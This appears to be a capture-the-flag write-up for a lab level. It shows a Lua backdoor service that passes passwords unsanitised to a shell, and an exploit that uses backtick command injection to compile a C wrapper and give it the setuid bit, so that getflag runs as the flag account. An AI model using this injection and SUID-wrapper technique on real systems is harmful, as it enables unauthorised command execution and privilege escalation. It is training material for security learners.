About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12 . Files for this level can be found in /home/flag12.
1local socket = require("socket")
2local server = assert(socket.bind("127.0.0.1", 50001))
3
4function hash(password)
5 prog = io.popen("echo "..password.." | sha1sum", "r")
6 data = prog:read("*all")
7 prog:close()
8
9 data = string.sub(data, 1, 40)
10
11 return data
12end
13
14
15while 1 do
16 local client = server:accept()
17 client:send("Password: ")
18 client:settimeout(60)
19 local line, err = client:receive()
20 if not err then
21 print("trying " .. line) -- log from where ;\
22 local h = hash(line)
23
24 if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
25 client:send("Better luck next time\n");
26 else
27 client:send("Congrats, your token is 413**CARRIER LOST**\n")
28 end
29
30 end
31
32 client:close()
33end
After initial reading it becomes obvious that you need to execute commands via
hash()
function.
It’s also quite obvious which commands and how to do that.
So, in this level (as well as in previous) we will re-use technique from older challenge (namelylevel03
).
First create wrapper /tmp/pwn.c
:
1
2
3
4
5
6
7
8
|
#include <stdio.h>
#include <stdlib.h>
int
main(
void
)
{
system
(
"/bin/getflag"
);
return
0;
}
|
Next telnet
to the server and execute magic string:
level12@nebula:~$ telnet localhost 50001
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Password: `gcc /tmp/pwn.c -o /tmp/pwn && chmod +s /tmp/pwn`;#
Better luck next time
Connection closed by foreign host.
After that we have SUID binary pwn
under /tmp
:
level12@nebula:~$ /tmp/pwn
You have successfully executed getflag on a target account
Roger-out.